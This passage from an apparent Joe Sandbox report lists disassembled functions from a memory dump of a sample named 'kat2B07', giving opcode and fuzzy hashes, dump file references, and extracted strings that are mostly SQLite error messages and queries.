                                                                • Opcode Fuzzy Hash: 4aff70db70698d3d4deceba07a4cbf931cb7e719ac6eb693cd0ab62b0a5dfe80
                                                                • Instruction Fuzzy Hash: AD3127762045516BC700DF29DD80BB6BBE0FF45326F0942AAF558CB683E325F960D7A2
                                                                Strings
                                                                • misuse, xrefs: 1D741D46
                                                                • %s at line %d of [%.10s], xrefs: 1D741D4B
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D741D3C
                                                                • unknown database: %s, xrefs: 1D741CBD
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                                • API String ID: 0-142545749
                                                                • Opcode ID: a7a00d5428d2657afe9e9b8d687db9e3253cbccb55ffe0241e6eba3e666aa4a0
                                                                • Instruction ID: 32cac092eab9ba0a7c02d439be94c9f787af51cfe53b5120728aaa26550f32e1
                                                                • Opcode Fuzzy Hash: a7a00d5428d2657afe9e9b8d687db9e3253cbccb55ffe0241e6eba3e666aa4a0
                                                                • Instruction Fuzzy Hash: E52149B5600740BBD712AE29EC44FA737A99FC1379F21462EFC6857242D330A50487B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 58380f6bb459bda6999c2e428dccbb8c2e238153befde08533b3a8d2ff0228c2
                                                                • Instruction ID: 539fe28472b11e126b2920d1f9027a4e1a5a9ed5610d7b7daaf2e39dc255cdce
                                                                • Opcode Fuzzy Hash: 58380f6bb459bda6999c2e428dccbb8c2e238153befde08533b3a8d2ff0228c2
                                                                • Instruction Fuzzy Hash: B021C4B7600221ABCB00EE18EC415FB7BD0EB84665F42447AFD94D7202E225E559C7E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: f620d4845387477f57b81ea7869ff9801f7a9906d984a2080d1bc5f280344888
                                                                • Instruction ID: 9c8a6b414d36e5f04c419f10c5f8af4e2409e4b0a75d4fa52541559ab887ee9e
                                                                • Opcode Fuzzy Hash: f620d4845387477f57b81ea7869ff9801f7a9906d984a2080d1bc5f280344888
                                                                • Instruction Fuzzy Hash: 52212C26544BA096C321DF28DC80AB3BFF19F55320F4544ADE6D687797F322F5818752
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                • API String ID: 0-3705377941
                                                                • Opcode ID: 2b812f4b891c20f0aaa6a91422a6cfa059cac5b3a202be4f458c199a6158ed3e
                                                                • Instruction ID: 44141157a714388165548e9969235f653f85a49541ff79c8190ddc887cb060fa
                                                                • Opcode Fuzzy Hash: 2b812f4b891c20f0aaa6a91422a6cfa059cac5b3a202be4f458c199a6158ed3e
                                                                • Instruction Fuzzy Hash: 3C21D1B09181219BDB009F2CD884B6A7B75AF023B5F104369F915DB291DB25E491CBB2
                                                                Strings
                                                                • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1D7533D6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                                • API String ID: 0-1935849370
                                                                • Opcode ID: a23079bdf3799a1523807a45537c61d78ed7ad1ed0ac587368151a3171a7c18a
                                                                • Instruction ID: 59d2a97f0f6be2155d7fcb1e3de87f38b1228a65ab3b12be5330036d9be5dbc2
                                                                • Opcode Fuzzy Hash: a23079bdf3799a1523807a45537c61d78ed7ad1ed0ac587368151a3171a7c18a
                                                                • Instruction Fuzzy Hash: DE0192397442169AD301DF29E800B9AB3D5EFC5322F1A817BF6048B250EB70A48787A3
                                                                Strings
                                                                • SELECT count(*) FROM %Q.'%q%s', xrefs: 1D813E26
                                                                • Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 1D813E6C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
                                                                • API String ID: 0-3026403748
                                                                • Opcode ID: c74277f92b1a2e6c23f2d5f8bd61ab11103bb814324993f82cb5dfd1d1910a4f
                                                                • Instruction ID: d997eb15447e0e425c2da4e549a9a9346da421d7bbac68f7aec6eaa1cfdc97eb
                                                                • Opcode Fuzzy Hash: c74277f92b1a2e6c23f2d5f8bd61ab11103bb814324993f82cb5dfd1d1910a4f
                                                                • Instruction Fuzzy Hash: 68F078B6C08341BFDB129B08EC80E3F36E5BFC4620F06082CF18A66521D325F5589763
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CE37D569,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5BF6
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5C08
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5C2A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: d236b6fca17a3635dfa342dd51fd8ccf83084f6b945305f8dbf748f57ea48eaa
                                                                • Instruction ID: 2a214860602a20225dbb4da1c16b39eadf1c7974e530b172be2b346fee2c1071
                                                                • Opcode Fuzzy Hash: d236b6fca17a3635dfa342dd51fd8ccf83084f6b945305f8dbf748f57ea48eaa
                                                                • Instruction Fuzzy Hash: D5018635918529FFDF018F94CD44BBEB7B8FB46751F000A69F815A2290DB78A900DE91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07475b4640544d698e1f907dfe8b4548b39635537f4a6ee8e2151293bd1b60a9
                                                                • Instruction ID: 30ac4edaf9441a607cbc5fab2039d30c183603a47b065be947fc9345fa18c4ff
                                                                • Opcode Fuzzy Hash: 07475b4640544d698e1f907dfe8b4548b39635537f4a6ee8e2151293bd1b60a9
                                                                • Instruction Fuzzy Hash: 7F0288B0908346DBC700DF28E885B2AB7F4BF45358F044A6DF9499B211EB75E954CBA3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77767a32d18c33a10dc3277d9abe722dcdd3f7bf1fa163fe5e489e0090fd71fc
                                                                • Instruction ID: 125e87d909dd04929b8332d4b65c823dc89959e825864f83a732f8da2fd6ef04
                                                                • Opcode Fuzzy Hash: 77767a32d18c33a10dc3277d9abe722dcdd3f7bf1fa163fe5e489e0090fd71fc
                                                                • Instruction Fuzzy Hash: 7DA16D70919621DBD7209F25D8C8B7A3778BF022E6F050266EC0697211DB39E564CFB7
                                                                Strings
                                                                • fts5: syntax error near "%.*s", xrefs: 1D85751C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fts5: syntax error near "%.*s"
                                                                • API String ID: 0-498961494
                                                                • Opcode ID: 7ccb9eef840e895d7696ea85395512b0e4401cc14221f6b762dbea41067b4154
                                                                • Instruction ID: cd95f8ac367fd51e709ab39780072de68d285763b3526dc0fb02705b159e377e
                                                                • Opcode Fuzzy Hash: 7ccb9eef840e895d7696ea85395512b0e4401cc14221f6b762dbea41067b4154
                                                                • Instruction Fuzzy Hash: 70B1BCB08083519FCB11DF28C884B6ABBE8BF45358F14891DF9898B251E774E585CFA7
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D771287
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77126C, 1D771278
                                                                • database corruption, xrefs: 1D771282
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 3d46d9a7437466a2b8ff5b202339bfef02eae1924a8f53068bd1345388712e3d
                                                                • Instruction ID: c63be0fea366b270c54f1cad4eefa2ca64ced2d2d0cdf29ed52fc6a0d20b172d
                                                                • Opcode Fuzzy Hash: 3d46d9a7437466a2b8ff5b202339bfef02eae1924a8f53068bd1345388712e3d
                                                                • Instruction Fuzzy Hash: 57A1BD746083518FDB05CF28E888B3737F6BB41264F054A6EED5A8B212E735E554CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [%d]
                                                                • API String ID: 0-394612830
                                                                • Opcode ID: b058a03e2875a3d94cf1016ef3624112a60e59a74bc390293cc0781bc0dcff68
                                                                • Instruction ID: 2dcda14f88807f0fc0ec3bc019cf99c0456a5f456f19bf521b43faacb7d5017f
                                                                • Opcode Fuzzy Hash: b058a03e2875a3d94cf1016ef3624112a60e59a74bc390293cc0781bc0dcff68
                                                                • Instruction Fuzzy Hash: B2713BB5908344AFDB21CE20DC85FA777E9AF85724F44891EEA8587191E338F5098763
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D836396
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D836387
                                                                • database corruption, xrefs: 1D836391
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: d244006a4f10ea6d67cbc360a96cf72f49a09bef9282d72577be4bec7da43476
                                                                • Instruction ID: b528956da0eaa688f5f2bbc1753b6b727fa1df2a03bef04ad027dbdcc455c1f3
                                                                • Opcode Fuzzy Hash: d244006a4f10ea6d67cbc360a96cf72f49a09bef9282d72577be4bec7da43476
                                                                • Instruction Fuzzy Hash: EE71E571A08241ABDB04DF1CD8C26BA77E4EF4432AF950559F89DC7252E335E844C793
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D771468
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D771459
                                                                • database corruption, xrefs: 1D771463
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
